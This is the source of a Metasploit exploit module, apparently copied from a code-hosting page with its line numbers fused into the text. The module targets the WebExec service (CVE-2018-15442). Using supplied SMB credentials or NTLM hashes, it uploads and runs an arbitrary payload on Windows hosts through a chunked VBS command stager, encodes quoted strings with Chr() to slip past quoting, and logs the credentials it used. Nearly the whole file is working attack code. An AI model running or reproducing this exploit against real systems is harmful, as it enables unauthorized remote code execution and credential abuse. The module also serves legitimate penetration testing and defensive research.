Path: blob/master/modules/exploits/windows/smb/webexec.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45# Windows XP systems that are not part of a domain default to treating all6# network logons as if they were Guest. This prevents SMB relay attacks from7# gaining administrative access to these systems. This setting can be found8# under:9#10# Local Security Settings >11# Local Policies >12# Security Options >13# Network Access: Sharing and security model for local accounts1415class MetasploitModule < Msf::Exploit::Remote16Rank = ManualRanking1718include Msf::Exploit::CmdStager19include Msf::Exploit::Remote::SMB::Client::WebExec20include Msf::Exploit::Powershell21include Msf::Exploit::EXE22include Msf::Exploit::WbemExec23include Msf::Auxiliary::Report2425def initialize(info = {})26super(27update_info(28info,29'Name' => 'WebExec Authenticated User Code Execution',30'Description' => %q{31This module uses a valid username and password of any level (or32password hash) to execute an arbitrary payload. This module is similar33to the "psexec" module, except allows any non-guest account by default.34},35'Author' => [36'Ron <[email protected]>',37],38'License' => MSF_LICENSE,39'Privileged' => true,40'DefaultOptions' => {41'WfsDelay' => 10,42'EXITFUNC' => 'thread'43},44'References' => [45['URL', 'https://webexec.org'],46[ 'CVE', '2018-15442' ],47],48'Payload' => {49'Space' => 3072,50'DisableNops' => true51},52'Platform' => 'win',53'Arch' => [ARCH_X86, ARCH_X64],54'Targets' => [55[ 'Automatic', {} ],56[ 'Native upload', {} ],57],58'DefaultTarget' => 0,59'DisclosureDate' => '2018-10-24',60'Notes' => {61'Reliability' => UNKNOWN_RELIABILITY,62'Stability' => UNKNOWN_STABILITY,63'SideEffects' => UNKNOWN_SIDE_EFFECTS64}65)66)6768register_options(69[70# This has to be a full path, %ENV% variables are not expanded71OptString.new('TMPDIR', [ true, "The directory to stage our payload in", "c:\\Windows\\Temp\\" ])72]73)7475register_advanced_options(76[77OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),78OptInt.new('MAX_LINE_LENGTH', [true, "The length of lines when splitting up the payload", 1000]),79]80)81end8283# This is the callback for cmdstager, which breaks the full command into84# chunks and sends it our way. We have to do a bit of finangling to make it85# work correctly86def execute_command(command, opts)87# Replace the empty string, "", with a workaround - the first 0 characters of "A"88command = command.gsub('""', 'mid(Chr(65), 1, 0)')8990# Replace quoted strings with Chr(XX) versions, in a naive way91command = command.gsub(/"[^"]*"/) do |capture|92capture.gsub(/"/, "").chars.map do |c|93"Chr(#{c.ord})"94end.join('+')95end9697# Prepend "cmd /c" so we can use a redirect98command = "cmd /c " + command99100execute_single_command(command, opts)101end102103def exploit104print_status("Connecting to the server...")105connect106107print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")108smb_login109110if not simple.client.auth_user and not datastore['ALLOW_GUEST']111print_line(" ")112print_error(113"FAILED! The remote host has only provided us with Guest privileges. " +114"Please make sure that the correct username and password have been provided. " +115"Windows XP systems that are not part of a domain will only provide Guest privileges " +116"to network logins by default."117)118print_line(" ")119disconnect120return121end122123begin124if datastore['SMBUser'].to_s.strip.length > 0125report_auth126end127128# Avoid implementing NTLMSSP on Windows XP129# http://seclists.org/metasploit/2009/q1/6130if smb_peer_os == "Windows 5.1"131connect(versions: [1])132smb_login133end134135wexec(true) do |opts|136opts[:flavor] = :vbs137opts[:linemax] = datastore['MAX_LINE_LENGTH']138opts[:temp] = datastore['TMPDIR']139opts[:delay] = 0.05140execute_cmdstager(opts)141end142handler143disconnect144end145end146147def report_auth148service_data = {149address: ::Rex::Socket.getaddress(datastore['RHOST'], true),150port: datastore['RPORT'],151service_name: 'smb',152protocol: 'tcp',153workspace_id: myworkspace_id154}155156credential_data = {157origin_type: :service,158module_fullname: self.fullname,159private_data: datastore['SMBPass'],160username: datastore['SMBUser'].downcase161}162163if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'164credential_data.merge!({165realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,166realm_value: datastore['SMBDomain']167})168end169170if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/171credential_data.merge!({ :private_type => :ntlm_hash })172else173credential_data.merge!({ :private_type => :password })174end175176credential_data.merge!(service_data)177178credential_core = create_credential(credential_data)179180login_data = {181access_level: 'Admin',182core: credential_core,183last_attempted_at: DateTime.now,184status: Metasploit::Model::Login::Status::SUCCESSFUL185}186187login_data.merge!(service_data)188create_credential_login(login_data)189end190end191192193